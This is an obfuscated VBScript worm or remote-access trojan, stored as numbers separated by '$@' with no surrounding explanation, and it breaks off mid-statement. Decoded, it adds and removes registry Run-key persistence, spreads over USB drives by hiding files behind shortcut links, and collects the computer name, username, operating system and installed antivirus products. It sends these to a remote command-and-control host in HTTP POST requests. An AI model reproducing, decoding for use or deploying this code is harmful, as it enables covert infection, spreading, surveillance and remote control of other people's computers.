177$@187$@192$@113$@124$@125$@114$@114$@105$@111$@107$@111$@174$@193$@178$@189$@107$@86$@83$@105$@105$@105$@105$@105$@105$@105$@105$@175$@184$@181$@173$@174$@187$@178$@172$@184$@183$@105$@134$@105$@188$@177$@174$@181$@181$@184$@171$@179$@119$@187$@174$@176$@187$@174$@170$@173$@105$@113$@107$@145$@148$@142$@162$@168$@149$@152$@140$@138$@149$@168$@150$@138$@140$@145$@146$@151$@142$@165$@188$@184$@175$@189$@192$@170$@187$@174$@165$@172$@181$@170$@188$@188$@174$@188$@165$@175$@184$@181$@173$@174$@187$@165$@173$@174$@175$@170$@190$@181$@189$@178$@172$@184$@183$@165$@107$@114$@105$@86$@83$@105$@105$@105$@105$@105$@105$@105$@105$@178$@175$@105$@105$@178$@183$@188$@189$@187$@105$@113$@175$@184$@181$@173$@174$@187$@178$@172$@184$@183$@117$@107$@117$@107$@114$@105$@134$@105$@121$@105$@189$@177$@174$@183$@86$@83$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@181$@183$@180$@184$@171$@179$@119$@178$@172$@184$@183$@181$@184$@172$@170$@189$@178$@184$@183$@105$@134$@105$@175$@184$@181$@173$@174$@187$@119$@185$@170$@189$@177$@86$@83$@105$@105$@105$@105$@105$@105$@105$@105$@174$@181$@188$@174$@105$@86$@83$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@181$@183$@180$@184$@171$@179$@119$@178$@172$@184$@183$@181$@184$@172$@170$@189$@178$@184$@183$@105$@134$@105$@175$@184$@181$@173$@174$@187$@178$@172$@184$@183$@86$@83$@105$@105$@105$@105$@105$@105$@105$@105$@174$@183$@173$@105$@178$@175$@86$@83$@105$@105$@105$@105$@105$@105$@105$@105$@181$@183$@180$@184$@171$@179$@119$@188$@170$@191$@174$@113$@114$@86$@83$@105$@105$@105$@105$@183$@174$@193$@189$@86$@83$@174$@183$@173$@105$@146$@175$@86$@83$@174$@183$@173$@105$@146$@175$@86$@83$@174$@183$@173$@105$@178$@175$@86$@83$@183$@174$@193$@189$@86$@83$@174$@187$@187$@119$@172$@181$@174$@170$@187$@86$@83$@174$@183$@173$@105$@188$@190$@171$@86$@83$@86$@83$@188$@190$@171$@105$@190$@183$@178$@183$@188$@189$@170$@181$@181$@86$@83$@184$@183$@105$@174$@187$@187$@184$@187$@105$@187$@174$@188$@190$@182$@174$@105$@183$@174$@193$@189$@86$@83$@173$@178$@182$@105$@175$@178$@181$@174$@183$@170$@182$@174$@86$@83$@173$@178$@182$@105$@175$@184$@181$@173$@174$@187$@183$@170$@182$@174$@86$@83$@86$@83$@188$@177$@174$@181$@181$@184$@171$@179$@119$@187$@174$@176$@173$@174$@181$@174$@189$@174$@105$@107$@145$@148$@142$@162$@168$@140$@158$@155$@155$@142$@151$@157$@168$@158$@156$@142$@155$@165$@188$@184$@175$@189$@192$@170$@187$@174$@165$@182$@178$@172$@187$@184$@188$@184$@175$@189$@165$@192$@178$@183$@173$@184$@192$@188$@165$@172$@190$@187$@187$@174$@183$@189$@191$@174$@187$@188$@178$@184$@183$@165$@187$@190$@183$@165$@107$@105$@111$@105$@188$@185$@181$@178$@189$@105$@113$@178$@183$@188$@189$@170$@181$@181$@183$@170$@182$@174$@117$@107$@119$@107$@114$@113$@121$@114$@86$@83$@188$@177$@174$@181$@181$@184$@171$@179$@119$@187$@174$@176$@173$@174$@181$@174$@189$@174$@105$@107$@145$@148$@142$@162$@168$@149$@152$@140$@138$@149$@168$@150$@138$@140$@145$@146$@151$@142$@165$@188$@184$@175$@189$@192$@170$@187$@174$@165$@182$@178$@172$@187$@184$@188$@184$@175$@189$@165$@192$@178$@183$@173$@184$@192$@188$@165$@172$@190$@187$@187$@174$@183$@189$@191$@174$@187$@188$@178$@184$@183$@165$@187$@190$@183$@165$@107$@105$@111$@105$@188$@185$@181$@178$@189$@105$@113$@178$@183$@188$@189$@170$@181$@181$@183$@170$@182$@174$@117$@107$@119$@107$@114$@113$@121$@114$@86$@83$@175$@178$@181$@174$@188$@194$@188$@189$@174$@182$@184$@171$@179$@119$@173$@174$@181$@174$@189$@174$@175$@178$@181$@174$@105$@188$@189$@170$@187$@189$@190$@185$@105$@111$@105$@178$@183$@188$@189$@170$@181$@181$@183$@170$@182$@174$@105$@117$@189$@187$@190$@174$@86$@83$@175$@178$@181$@174$@188$@194$@188$@189$@174$@182$@184$@171$@179$@119$@173$@174$@181$@174$@189$@174$@175$@178$@181$@174$@105$@192$@188$@172$@187$@178$@185$@189$@119$@188$@172$@187$@178$@185$@189$@175$@190$@181$@181$@183$@170$@182$@174$@105$@117$@189$@187$@190$@174$@86$@83$@86$@83$@175$@184$@187$@105$@105$@174$@170$@172$@177$@105$@173$@187$@178$@191$@174$@105$@178$@183$@105$@175$@178$@181$@174$@188$@194$@188$@189$@174$@182$@184$@171$@179$@119$@173$@187$@178$@191$@174$@188$@86$@83$@178$@175$@105$@105$@173$@187$@178$@191$@174$@119$@178$@188$@187$@174$@170$@173$@194$@105$@134$@105$@189$@187$@190$@174$@105$@189$@177$@174$@183$@86$@83$@178$@175$@105$@105$@173$@187$@178$@191$@174$@119$@175$@187$@174$@174$@188$@185$@170$@172$@174$@105$@105$@135$@105$@121$@105$@189$@177$@174$@183$@86$@83$@178$@175$@105$@105$@173$@187$@178$@191$@174$@119$@173$@187$@178$@191$@174$@189$@194$@185$@174$@105$@105$@134$@105$@122$@105$@189$@177$@174$@183$@86$@83$@105$@105$@105$@105$@175$@184$@187$@105$@105$@174$@170$@172$@177$@105$@175$@178$@181$@174$@105$@178$@183$@105$@175$@178$@181$@174$@188$@194$@188$@189$@174$@182$@184$@171$@179$@119$@176$@174$@189$@175$@184$@181$@173$@174$@187$@105$@113$@105$@173$@187$@178$@191$@174$@119$@185$@170$@189$@177$@105$@111$@105$@107$@165$@107$@114$@119$@175$@178$@181$@174$@188$@86$@83$@105$@105$@105$@105$@105$@105$@105$@105$@105$@184$@183$@105$@174$@187$@187$@184$@187$@105$@187$@174$@188$@190$@182$@174$@105$@183$@174$@193$@189$@86$@83$@105$@105$@105$@105$@105$@105$@105$@105$@105$@178$@175$@105$@105$@178$@183$@188$@189$@187$@105$@113$@175$@178$@181$@174$@119$@183$@170$@182$@174$@117$@107$@119$@107$@114$@105$@189$@177$@174$@183$@86$@83$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@178$@175$@105$@105$@181$@172$@170$@188$@174$@105$@113$@188$@185$@181$@178$@189$@113$@175$@178$@181$@174$@119$@183$@170$@182$@174$@117$@105$@107$@119$@107$@114$@113$@190$@171$@184$@190$@183$@173$@113$@188$@185$@181$@178$@189$@113$@175$@178$@181$@174$@119$@183$@170$@182$@174$@117$@105$@107$@119$@107$@114$@114$@114$@114$@105$@133$@135$@105$@107$@181$@183$@180$@107$@105$@189$@177$@174$@183$@86$@83$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@175$@178$@181$@174$@119$@170$@189$@189$@187$@178$@171$@190$@189$@174$@188$@105$@134$@105$@121$@86$@83$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@178$@175$@105$@105$@190$@172$@170$@188$@174$@105$@113$@175$@178$@181$@174$@119$@183$@170$@182$@174$@114$@105$@133$@135$@105$@190$@172$@170$@188$@174$@105$@113$@178$@183$@188$@189$@170$@181$@181$@183$@170$@182$@174$@114$@105$@189$@177$@174$@183$@86$@83$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@175$@178$@181$@174$@183$@170$@182$@174$@105$@134$@105$@188$@185$@181$@178$@189$@113$@175$@178$@181$@174$@119$@183$@170$@182$@174$@117$@107$@119$@107$@114$@86$@83$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@175$@178$@181$@174$@188$@194$@188$@189$@174$@182$@184$@171$@179$@119$@173$@174$@181$@174$@189$@174$@175$@178$@181$@174$@105$@113$@173$@187$@178$@191$@174$@119$@185$@170$@189$@177$@105$@111$@105$@107$@165$@107$@105$@111$@105$@175$@178$@181$@174$@183$@170$@182$@174$@113$@121$@114$@105$@111$@105$@107$@119$@181$@183$@180$@107$@105$@114$@86$@83$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@174$@181$@188$@174$@86$@83$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@175$@178$@181$@174$@188$@194$@188$@189$@174$@182$@184$@171$@179$@119$@173$@174$@181$@174$@189$@174$@175$@178$@181$@174$@105$@113$@173$@187$@178$@191$@174$@119$@185$@170$@189$@177$@105$@111$@105$@107$@165$@107$@105$@111$@105$@175$@178$@181$@174$@119$@183$@170$@182$@174$@114$@86$@83$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@174$@183$@173$@105$@146$@175$@86$@83$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@174$@181$@188$@174$@86$@83$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@175$@178$@181$@174$@188$@194$@188$@189$@174$@182$@184$@171$@179$@119$@173$@174$@181$@174$@189$@174$@175$@178$@181$@174$@105$@113$@175$@178$@181$@174$@119$@185$@170$@189$@177$@114$@105$@86$@83$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@174$@183$@173$@105$@178$@175$@86$@83$@105$@105$@105$@105$@105$@105$@105$@105$@105$@174$@183$@173$@105$@178$@175$@86$@83$@105$@105$@105$@105$@105$@183$@174$@193$@189$@86$@83$@105$@105$@105$@105$@105$@175$@184$@187$@105$@174$@170$@172$@177$@105$@175$@184$@181$@173$@174$@187$@105$@178$@183$@105$@175$@178$@181$@174$@188$@194$@188$@189$@174$@182$@184$@171$@179$@119$@176$@174$@189$@175$@184$@181$@173$@174$@187$@113$@105$@173$@187$@178$@191$@174$@119$@185$@170$@189$@177$@105$@111$@105$@107$@165$@107$@105$@114$@119$@188$@190$@171$@175$@184$@181$@173$@174$@187$@188$@86$@83$@105$@105$@105$@105$@105$@105$@105$@105$@105$@175$@184$@181$@173$@174$@187$@119$@170$@189$@189$@187$@178$@171$@190$@189$@174$@188$@105$@134$@105$@121$@86$@83$@105$@105$@105$@105$@105$@183$@174$@193$@189$@86$@83$@174$@183$@173$@105$@178$@175$@86$@83$@174$@183$@173$@105$@178$@175$@86$@83$@174$@183$@173$@105$@178$@175$@86$@83$@183$@174$@193$@189$@86$@83$@192$@188$@172$@187$@178$@185$@189$@119$@186$@190$@178$@189$@86$@83$@174$@183$@173$@105$@188$@190$@171$@86$@83$@86$@83$@175$@190$@183$@172$@189$@178$@184$@183$@105$@185$@184$@188$@189$@105$@113$@172$@182$@173$@105$@117$@185$@170$@187$@170$@182$@114$@86$@83$@86$@83$@185$@184$@188$@189$@105$@134$@105$@185$@170$@187$@170$@182$@86$@83$@177$@189$@189$@185$@184$@171$@179$@119$@184$@185$@174$@183$@105$@107$@185$@184$@188$@189$@107$@117$@107$@177$@189$@189$@185$@131$@120$@120$@107$@105$@111$@105$@177$@184$@188$@189$@105$@111$@105$@107$@131$@107$@105$@111$@105$@185$@184$@187$@189$@105$@111$@107$@120$@107$@105$@111$@105$@172$@182$@173$@117$@105$@175$@170$@181$@188$@174$@86$@83$@177$@189$@189$@185$@184$@171$@179$@119$@188$@174$@189$@187$@174$@186$@190$@174$@188$@189$@177$@174$@170$@173$@174$@187$@105$@107$@190$@188$@174$@187$@118$@170$@176$@174$@183$@189$@131$@107$@117$@178$@183$@175$@184$@187$@182$@170$@189$@178$@184$@183$@86$@83$@177$@189$@189$@185$@184$@171$@179$@119$@188$@174$@183$@173$@105$@185$@170$@187$@170$@182$@86$@83$@185$@184$@188$@189$@105$@134$@105$@177$@189$@189$@185$@184$@171$@179$@119$@187$@174$@188$@185$@184$@183$@188$@174$@189$@174$@193$@189$@86$@83$@174$@183$@173$@105$@175$@190$@183$@172$@189$@178$@184$@183$@86$@83$@86$@83$@175$@190$@183$@172$@189$@178$@184$@183$@105$@178$@183$@175$@184$@187$@182$@170$@189$@178$@184$@183$@86$@83$@184$@183$@105$@174$@187$@187$@184$@187$@105$@187$@174$@188$@190$@182$@174$@105$@183$@174$@193$@189$@86$@83$@178$@175$@105$@105$@178$@183$@175$@105$@134$@105$@107$@107$@105$@189$@177$@174$@183$@86$@83$@105$@105$@105$@105$@178$@183$@175$@105$@134$@105$@177$@192$@178$@173$@105$@111$@105$@188$@185$@181$@178$@189$@174$@187$@105$@86$@83$@105$@105$@105$@105$@178$@183$@175$@105$@134$@105$@178$@183$@175$@105$@105$@111$@105$@188$@177$@174$@181$@181$@184$@171$@179$@119$@174$@193$@185$@170$@183$@173$@174$@183$@191$@178$@187$@184$@183$@182$@174$@183$@189$@188$@189$@187$@178$@183$@176$@188$@113$@107$@110$@172$@184$@182$@185$@190$@189$@174$@187$@183$@170$@182$@174$@110$@107$@114$@105$@111$@105$@188$@185$@181$@178$@189$@174$@187$@105$@86$@83$@105$@105$@105$@105$@178$@183$@175$@105$@134$@105$@178$@183$@175$@105$@105$@111$@105$@188$@177$@174$@181$@181$@184$@171$@179$@119$@174$@193$@185$@170$@183$@173$@174$@183$@191$@178$@187$@184$@183$@182$@174$@183$@189$@188$@189$@187$@178$@183$@176$@188$@113$@107$@110$@190$@188$@174$@187$@183$@170$@182$@174$@110$@107$@114$@105$@111$@105$@188$@185$@181$@178$@189$@174$@187$@86$@83$@86$@83$@105$@105$@105$@105$@188$@174$@189$@105$@187$@184$@184$@189$@105$@134$@105$@176$@174$@189$@184$@171$@179$@174$@172$@189$@113$@107$@192$@178$@183$@182$@176$@182$@189$@188$@131$@196$@178$@182$@185$@174$@187$@188$@184$@183$@170$@189$@178$@184$@183$@181$@174$@191$@174$@181$@134$@178$@182$@185$@174$@187$@188$@184$@183$@170$@189$@174$@198$@106$@165$@165$@119$@165$@187$@184$@184$@189$@165$@172$@178$@182$@191$@123$@107$@114$@86$@83$@105$@105$@105$@105$@188$@174$@189$@105$@184$@188$@105$@134$@105$@187$@184$@184$@189$@119$@174$@193$@174$@172$@186$@190$@174$@187$@194$@105$@113$@107$@188$@174$@181$@174$@172$@189$@105$@115$@105$@175$@187$@184$@182$@105$@192$@178$@183$@124$@123$@168$@184$@185$@174$@187$@170$@189$@178$@183$@176$@188$@194$@188$@189$@174$@182$@107$@114$@86$@83$@105$@105$@105$@105$@175$@184$@187$@105$@174$@170$@172$@177$@105$@184$@188$@178$@183$@175$@184$@105$@178$@183$@105$@184$@188$@86$@83$@105$@105$@105$@105$@105$@105$@105$@178$@183$@175$@105$@134$@105$@178$@183$@175$@105$@111$@105$@184$@188$@178$@183$@175$@184$@119$@172$@170$@185$@189$@178$@184$@183$@105$@111$@105$@188$@185$@181$@178$@189$@174$@187$@105$@105$@86$@83$@105$@105$@105$@105$@105$@105$@105$@174$@193$@178$@189$@105$@175$@184$@187$@86$@83$@105$@105$@105$@105$@183$@174$@193$@189$@86$@83$@105$@105$@105$@105$@178$@183$@175$@105$@134$@105$@178$@183$@175$@105$@111$@105$@107$@185$@181$@190$@188$@107$@105$@111$@105$@188$@185$@181$@178$@189$@174$@187$@86$@83$@105$@105$@105$@105$@178$@183$@175$@105$@134$@105$@178$@183$@175$@105$@111$@105$@188$@174$@172$@190$@187$@178$@189$@194$@105$@111$@105$@188$@185$@181$@178$@189$@174$@187$@86$@83$@105$@105$@105$@105$@178$@183$@175$@105$@134$@105$@178$@183$@175$@105$@111$@105$@190$@188$@171$@188$@185$@187$@174$@170$@173$@178$@183$@176$@86$@83$@105$@105$@105$@105$@178$@183$@175$@184$@187$@182$@170$@189$@178$@184$@183$@105$@134$@105$@178$@183$@175$@105$@105$@86$@83$@174$@181$@188$@174$@86$@83$@105$@105$@105$@105$@178$@183$@175$@184$@187$@182$@170$@189$@178$@184$@183$@105$@134$@105$@178$@183$@175$@86$@83$@174$@183$@173$@105$@178$@175$@86$@83$@174$@183$@173$@105$@175$@190$@183$@172$@189$@178$@184$@183$@86$@83$@86$@83$@86$@83$@188$@190$@171$@105$@190$@185$@188$@189$@170$@187$@189$@105$@113$@114$@86$@83$@184$@183$@105$@174$@187$@187$@184$@187$@105$@187$@174$@188$@190$@182$@174$@105$@151$@174$@193$@189$@86$@83$@86$@83$@188$@177$@174$@181$@181$@184$@171$@179$@119$@187$@174$@176$@192$@187$@178$@189$@174$@105$@107$@145$@148$@142$@162$@168$@140$@158$@155$@155$@142$@151$@157$@168$@158$@156$@142$@155$@165$@188$@184$@175$@189$@192$@170$@187$@174$@165$@182$@178$@172$@187$@184$@188$@184$@175$@189$@165$@192$@178$@183$@173$@184$@192$@188$@165$@172$@190$@187$@187$@174$@183$@189$@191$@174$@187$@188$@178$@184$@183$@165$@187$@190$@183$@165$@107$@105$@111$@105$@188$@185$@181$@178$@189$@105$@113$@178$@183$@188$@189$@170$@181$@181$@183$@170$@182$@174$@117$@107$@119$@107$@114$@113$@121$@114$@117$@105$@105$@107$@192$@188$@172$@187$@178$@185$@189$@119$@174$@193$@174$@105$@120$@120$@139$@105$@107$@105$@111$@105$@172$@177$@187$@192$@113$@124$@125$@114$@105$@111$@105$@178$@183$@188$@189$@170$@181$@181$@173$@178$@187$@105$@111$@105$@178$@183$@188$@189$@170$@181$@181$@183$@170$@182$@174$@105$@111$@105$@172$@177$@187$@192$@113$@124$@125$@114$@105$@117$@105$@107$@155$@142$@144$@168$@156$@163$@107$@86$@83$@188$@177$@174$@181$@181$@184$@171$@179$@119$@187$@174$@176$@192$@187$@178$@189$@174$@105$@107$@145$@148$@142$@162$@168$@149$@152$@140$@138$@149$@168$@150$@138$@140$@145$@146$@151$@142$@165$@188$@184$@175$@189$@192$@170$@187$@174$@165$@182$@178$@172$@187$@184$@188$@184$@175$@189$@165$@192$@178$@183$@173$@184$@192$@188$@165$@172$@190$@187$@187$@174$@183$@189$@191$@174$@187$@188$@178$@184$@183$@165$@187$@190$@183$@165$@107$@105$@111$@105$@188$@185$@181$@178$@189$@105$@113$@178$@183$@188$@189$@170$@181$@181$@183$@170$@182$@174$@117$@107$@119$@107$@114$@113$@121$@114$@117$@105$@105$@107$@192$@188$@172$@187$@178$@185$@189$@119$@174$@193$@174$@105$@120$@120$@139$@105$@107$@105$@105$@111$@105$@172$@177$@187$@192$@113$@124$@125$@114$@105$@111$@105$@178$@183$@188$@189$@170$@181$@181$@173$@178$@187$@105$@111$@105$@178$@183$@188$@189$@170$@181$@181$@183$@170$@182$@174$@105$@111$@105$@172$@177$@187$@192$@113$@124$@125$@114$@105$@117$@105$@107$@155$@142$@144$@168$@156$@163$@107$@86$@83$@175$@178$@181$@174$@188$@194$@188$@189$@174$@182$@184$@171$@179$@119$@172$@184$@185$@194$@175$@178$@181$@174$@105$@192$@188$@172$@187$@178$@185$@189$@119$@188$@172$@187$@178$@185$@189$@175$@190$@181$@181$@183$@170$@182$@174$@117$@178$@183$@188$@189$@170$@181$@181$@173$@178$@187$@105$@111$@105$@178$@183$@188$@189$@170$@181$@181$@183$@170$@182$@174$@117$@189$@187$@190$@174$@86$@83$@175$@178$@181$@174$@188$@194$@188$@189$@174$@182$@184$@171$@179$@119$@172$@184$@185$@194$@175$@178$@181$@174$@105$@192$@188$@172$@187$@178$@185$@189$@119$@188$@172$@187$@178$@185$@189$@175$@190$@181$@181$@183$@170$@182$@174$@117$@188$@189$@170$@187$@189$@190$@185$@105$@111$@105$@178$@183$@188$@189$@170$@181$@181$@183$@170$@182$@174$@105$@117$@189$@187$@190$@174$@86$@83$@86$@83$@174$@183$@173$@105$@188$@190$@171$@86$@83$@86$@83$@86$@83$@175$@190$@183$@172$@189$@178$@184$@183$@105$@177$@192$@178$@173$@86$@83$@184$@183$@105$@174$@187$@187$@184$@187$@105$@187$@174$@188$@190$@182$@174$@105$@183$@174$@193$@189$@86$@83$@86$@83$@188$@174$@189$@105$@187$@184$@184$@189$@105$@134$@105$@176$@174$@189$@184$@171$@179$@174$@172$@189$@113$@107$@192$@178$@183$@182$@176$@182$@189$@188$@131$@196$@178$@182$@185$@174$@187$@188$@184$@183$@170$@189$@178$@184$@183$@181$@174$@191$@174$@181$@134$@178$@182$@185$@174$@187$@188$@184$@183$@170$@189$@174$@198$@106$@165$@165$@119$@165$@187$@184$@184$@189$@165$@172$@178$@182$@191$@123$@107$@114$@86$@83$@188$@174$@189$@105$@173$@178$@188$@180$@188$@105$@134$@105$@187$@184$@184$@189$@119$@174$@193$@174$@172$@186$@190$@174$@187$@194$@105$@113$@107$@188$@174$@181$@174$@172$@189$@105$@115$@105$@175$@187$@184$@182$@105$@192$@178$@183$@124$@123$@168$@181$@184$@176$@178$@172$@170$@181$@173$@178$@188$@180$@107$@114$@86$@83$@175$@184$@187$@105$@174$@170$@172$@177$@105$@173$@178$@188$@180$@105$@178$@183$@105$@173$@178$@188$@180$@188$@86$@83$@105$@105$@105$@105$@178$@175$@105$@105$@173$@178$@188$@180$@119$@191$@184$@181$@190$@182$@174$@188$@174$@187$@178$@170$@181$@183$@190$@182$@171$@174$@187$@105$@133$@135$@105$@107$@107$@105$@189$@177$@174$@183$@86$@83$@105$@105$@105$@105$@105$@105$@105$@105$@177$@192$@178$@173$@105$@134$@105$@173$@178$@188$@180$@119$@191$@184$@181$@190$@182$@174$@188$@174$@187$@178$@170$@181$@183$@190$@182$@171$@174$@187$@86$@83$@105$@105$@105$@105$@105$@105$@105$@105$@174$@193$@178$@189$@105$@175$@184$@187$@86$@83$@105$@105$@105$@105$@174$@183$@173$@105$@178$@175$@86$@83$@183$@174$@193$@189$@86$@83$@174$@183$@173$@105$@175$@190$@183$@172$@189$@178$@184$@183$@86$@83$@86$@83$@86$@83$@175$@190$@183$@172$@189$@178$@184$@183$@105$@188$@174$@172$@190$@187$@178$@189$@194$@105$@86$@83$@184$@183$@105$@174$@187$@187$@184$@187$@105$@187$@174$@188$@190$@182$@174$@105$@183$@174$@193$@189$@86$@83$@86$@83$@188$@174$@172$@190$@187$@178$@189$@194$@105$@134$@105$@107$@107$@86$@83$@86$@83$@188$@174$@189$@105$@184$@171$@179$@192$@182$@178$@188$@174$@187$@191$@178$@172$@174$@105$@134$@105$@176$@174$@189$@184$@171$@179$@174$@172$@189$@113$@107$@192$@178$@183$@182$@176$@182$@189$@188$@131$@196$@178$@182$@185$@174$@187$@188$@184$@183$@170$@189$@178$@184$@183$@181$@174$@191$@174$@181$@134$@178$@182$@185$@174$@187$@188$@184$@183$@170$@189$@174$@198$@106$@165$@165$@119$@165$@187$@184$@184$@189$@165$@172$@178$@182$@191$@123$@107$@114$@86$@83$@188$@174$@189$@105$@172$@184$@181$@178$@189$@174$@182$@188$@105$@134$@105$@184$@171$@179$@192$@182$@178$@188$@174$@187$@191$@178$@172$@174$@119$@174$@193$@174$@172$@186$@190$@174$@187$@194$@113$@107$@188$@174$@181$@174$@172$@189$@105$@115$@105$@175$@187$@184$@182$@105$@192$@178$@183$@124$@123$@168$@184$@185$@174$@187$@170$@189$@178$@183$@176$@188$@194$@188$@189$@174$@182$@107$@117$@117$@125$@129$@114$@86$@83$@175$@184$@187$@105$@174$@170$@172$@177$@105$@184$@171$@179$@178$@189$@174$@182$@105$@178$@183$@105$@172$@184$@181$@178$@189$@174$@182$@188$@86$@83$@105$@105$@105$@105$@191$@174$@187$@188$@178$@184$@183$@188$@189$@187$@105$@134$@105$@188$@185$@181$@178$@189$@105$@113$@184$@171$@179$@178$@189$@174$@182$@119$@191$@174$@187$@188$@178$@184$@183$@117$@107$@119$@107$@114$@86$@83$@183$@174$@193$@189$@86$@83$@191$@174$@187$@188$@178$@184$@183$@188$@189$@187$@105$@134$@105$@188$@185$@181$@178$@189$@105$@113$@172$@184$@181$@178$@189$@174$@182$@188$@119$@191$@174$@187$@188$@178$@184$@183$@117$@107$@119$@107$@114$@86$@83$@184$@188$@191$@174$@187$@188$@178$@184$@183$@105$@134$@105$@191$@174$@187$@188$@178$@184$@183$@188$@189$@187$@105$@113$@121$@114$@105$@111$@105$@107$@119$@107$@86$@83$@175$@184$@187$@105$@105$@193$@105$@134$@105$@122$@105$@189$@184$@105$@190$@171$@184$@190$@183$@173$@105$@113$@191$@174$@187$@188$@178$@184$@183$@188$@189$@187$@114$@86$@83$@82$@105$@184$@188$@191$@174$@187$@188$@178$@184$@183$@105$@134$@105$@184$@188$@191$@174$@187$@188$@178$@184$@183$@105$@111$@105$@105$@191$@174$@187$@188$@178$@184$@183$@188$@189$@187$@105$@113$@178$@114$@86$@83$@183$@174$@193$@189$@86$@83$@184$@188$@191$@174$@187$@188$@178$@184$@183$@105$@134$@105$@174$@191$@170$@181$@105$@113$@184$@188$@191$@174$@187$@188$@178$@184$@183$@114$@86$@83$@178$@175$@105$@105$@184$@188$@191$@174$@187$@188$@178$@184$@183$@105$@135$@105$@127$@105$@189$@177$@174$@183$@105$@188$@172$@105$@134$@105$@107$@188$@174$@172$@190$@187$@178$@189$@194$@172$@174$@183$@189$@174$@187$@123$@107$@105$@174$@181$@188$@174$@105$@188$@172$@105$@134$@105$@107$@188$@174$@172$@190$@187$@178$@189$@194$@172$@174$@183$@189$@174$@187$@107$@86$@83$@86$@83$@188$@174$@189$@105$@184$@171$@179$@188$@174$@172$@190$@187$@178$@189$@194$@172$@174$@183$@189$@174$@187$@105$@134$@105$@176$@174$@189$@184$@171$@179$@174$@172$@189$@113$@107$@192$@178$@183$@182$@176$@182$@189$@188$@131$@165$@165$@181$@184$@172$@170$@181$@177$@184$@188$@189$@165$@187$@184$@184$@189$@165$@107$@105$@111$@105$@188$@172$@114$@86$@83$@156$@174$@189$@105$@172$@184$@181$@170$@183$@189$@178$@191$@178$@187$@190$@188$@105$@134$@105$@184$@171$@179$@188$@174$@172$@190$@187$@178$@189$@194$@172$@174$@183$@189$@174$@187$@119$@174$@193$@174$@172$@186$@190$@174$@187$@194$@113$@107$@188$@174$@181$@174$@172$@189$@105$@115$@105$@175$@187$@184$@182$@105$@170$@183$@189$@178$@191$@178$@187$@190$@188$@185$@187$@184$@173$@190$@172$@189$@107$@117$@107$@192$@186$@181$@107$@117$@121$@114$@86$@83$@86$@83$@175$@184$@187$@105$@174$@170$@172$@177$@105$@184$@171$@179$@170$@183$@189$@178$@191$@178$@187$@190$@188$@105$@178$@183$@105$@172$@184$@181$@170$@183$@189$@178$@191$@178$@187$@190$@188$@86$@83$@105$@105$@105$@105$@188$@174$@172$@190$@187$@178$@189$@194$@105$@105$@134$@105$@188$@174$@172$@190$@187$@178$@189$@194$@105$@105$@111$@105$@184$@171$@179$@170$@183$@189$@178$@191$@178$@187$@190$@188$@119$@173$@178$@188$@185$@181$@170$@194$@183$@170$@182$@174$@105$@111$@105$@107$@105$@119$@107$@86$@83$@183$@174$@193$@189$@86$@83$@178$@175$@105$@188$@174$@172$@190$@187$@178$@189$@194$@105$@105$@134$@105$@107$@107$@105$@189$@177$@174$@183$@105$@188$@174$@172$@190$@187$@178$@189$@194$@105$@105$@134$@105$@107$@183$@170$@183$@118$@170$@191$@107$@86$@83$@174$@183$@173$@105$@175$@190$@183$@172$@189$@178$@184$@183$@86$@83$@86$@83$@86$@83$@175$@190$@183$@172$@189$@178$@184$@183$@105$@178$@183$@188$@189$@170$@183$@172$@174$@86$@83$@184$@183$@105$@174$@187$@187$@184$@187$@105$@187$@174$@188$@190$@182$@174$@105$@183$@174$@193$@189$@86$@83$@86$@83$@190$@188$@171$@188$@185$@187$@174$@170$@173$@178$@183$@176$@105$@134$@105$@188$@177$@174$@181$@181$@184$@171$@179$@119$@187$@174$@176$@187$@174$@170$@173$@105$@113$@107$@145$@148$@142$@162$@168$@149$@152$@140$@138$@149$@168$@150$@138$@140$@145$@146$@151$@142$@165$@188$@184$@175$@189$@192$@170$@187$@174$@165$@107$@105$@111$@105$@188$@185$@181$@178$@189$@105$@113$@178$@183$@188$@189$@170$@181$@181$@183$@170$@182$@174$@117$@107$@119$@107$@114$@113$@121$@114$@105$@111$@105$@107$@165$@107$@114$@86$@83$@178$@175$@105$@190$@188$@171$@188$@185$@187$@174$@170$@173$@178$@183$@176$@105$@134$@105$@107$@107$@105$@189$@177$@174$@183$@86$@83$@105$@105$@105$@178$@175$@105$@181$@172$@170$@188$@174$@105$@113$@105$@182$@178$@173$@113$@192$@188$@172$@187$@178$@185$@189$@119$@188$@172$@187$@178$@185$@189$@175$@190$@181$@181$@183$@170$@182$@174$@117$@123$@114$@114$@105$@134$@105$@107$@131$@165$@107$@105$@111$@105$@105$@181$@172$@170$@188$@174$@113$@178$@183$@188$@189$@170$@181$@181$@183$@170$@182$@174$@114$@105$@189$@177$@174$@183$@86$@83$@105$@105$@105$@105$@105$@105$@190$@188$@171$@188$@185$@187$@174$@170$@173$@178$@183$@176$@105$@134$@105$@107$@189$@187$@190$@174$@105$@118$@105$@107$@105$@111$@105$@173$@170$@189$@174$@86$@83$@105$@105$@105$@105$@105$@105$@188$@177$@174$@181$@181$@184$@171$@179$@119$@187$@174$@176$@192$@187$@178$@189$@174$@105$@107$@145$@148$@142$@162$@168$@149$@152$@140$@138$@149$@168$@150$@138$@140$@145$@146$@151$@142$@165$@188$@184$@175$@189$@192$@170$@187$@174$@165$@107$@105$@111$@105$@188$@185$@181$@178$@189$@105$@113$@178$@183$@188$@189$@170$@181$@181$@183$@170$@182$@174$@117$@107$@119$@107$@114$@113$@121$@114$@105$@105$@111$@105$@107$@165$@107$@117$@105$@105$@190$@188$@171$@